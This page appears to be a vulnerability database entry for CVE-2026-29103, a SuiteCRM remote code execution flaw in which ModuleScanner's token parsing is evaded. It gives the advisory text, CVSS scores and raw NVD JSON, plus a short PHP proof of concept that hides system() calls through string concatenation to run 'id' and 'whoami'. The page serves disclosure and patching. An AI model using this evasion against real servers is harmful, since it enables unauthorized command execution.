Security Vulnerability Report
中文
CVE-2026-29103 CVSS 9.1 CRITICAL

CVE-2026-29103

Published: 2026-03-19 23:16:43
Last Modified: 2026-03-24 14:23:34
Source: [email protected]

Description

SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. A Critical Remote Code Execution (RCE) vulnerability exists in SuiteCRM 7.15.0 and 8.9.2, allowing authenticated administrators to execute arbitrary system commands. This vulnerability is a direct Patch Bypass of CVE-2024-49774. Although the vendor attempted to fix the issue in version 7.14.5, the underlying flaw in ModuleScanner.php regarding PHP token parsing remains. The scanner incorrectly resets its internal state ($checkFunction flag) when encountering any single-character token (such as =, ., or ;). This allows attackers to hide dangerous function calls (e.g., system(), exec()) using variable assignments or string concatenation, completely evading the MLP security controls. Versions 7.15.1 and 8.9.3 patch the issue.

CVSS Details

CVSS Score
9.1
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:* - VULNERABLE
SuiteCRM 7.15.0
SuiteCRM 8.9.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php // PoC for CVE-2026-29103 (SuiteCRM RCE) // Exploits the token parsing flaw in ModuleScanner.php // The scanner resets $checkFunction on single characters like '.' // Method 1: String Concatenation $a = 'sys'; $b = 'tem'; // The '.' character causes the scanner to reset state $func = $a . $b; $func('id'); // Executes system('id') // Method 2: Variable Assignment/Obfuscation $d = 'sys' . chr(116) . 'em'; $d('whoami'); ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-29103", "sourceIdentifier": "[email protected]", "published": "2026-03-19T23:16:42.970", "lastModified": "2026-03-24T14:23:34.037", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM is an open-source, enterprise-ready Customer Relationship Management (CRM) software application. A Critical Remote Code Execution (RCE) vulnerability exists in SuiteCRM 7.15.0 and 8.9.2, allowing authenticated administrators to execute arbitrary system commands. This vulnerability is a direct Patch Bypass of CVE-2024-49774. Although the vendor attempted to fix the issue in version 7.14.5, the underlying flaw in ModuleScanner.php regarding PHP token parsing remains. The scanner incorrectly resets its internal state ($checkFunction flag) when encountering any single-character token (such as =, ., or ;). This allows attackers to hide dangerous function calls (e.g., system(), exec()) using variable assignments or string concatenation, completely evading the MLP security controls. Versions 7.15.1 and 8.9.3 patch the issue."}, {"lang": "es", "value": "SuiteCRM es una aplicación de software de gestión de relaciones con el cliente (CRM) de código abierto y lista para empresas. Una vulnerabilidad crítica de ejecución remota de código (RCE) existe en SuiteCRM 7.15.0 y 8.9.2, permitiendo a administradores autenticados ejecutar comandos de sistema arbitrarios. Esta vulnerabilidad es un bypass directo del parche de CVE-2024-49774. Aunque el proveedor intentó solucionar el problema en la versión 7.14.5, la falla subyacente en ModuleScanner.php con respecto al análisis de tokens de PHP persiste. El escáner restablece incorrectamente su estado interno (bandera $checkFunction) al encontrar cualquier token de un solo carácter (como =, ., o ;). Esto permite a los atacantes ocultar llamadas a funciones peligrosas (por ejemplo, system(), exec()) utilizando asignaciones de variables o concatenación de cadenas, evadiendo completamente los controles de seguridad de MLP. Las versiones 7.15.1 y 8.9.3 parchean el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-358"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.15.1", "matchCriteriaId": "73648654-E7F6-47CF-8E01-19BBFF737C99"}, {"vulnerable": true, "criteria": "cpe:2.3:a:suitecrm:suitecrm:*:*:*:*:*:*:*:*", "versionStartIncluding": "8.0.0", "versionEndExcluding": "8.9.3", "matchCriteriaId": "C7E15DD3-A934-40A2-8B43-ABCCBB53CBCF"}]}]}], "references": [{"url": "https://docs.suitecrm.com/admin/releases/7.15.x", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/SuiteCRM/SuiteCRM/security/advisories/GHSA-5jjq-9qch-9rg7", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.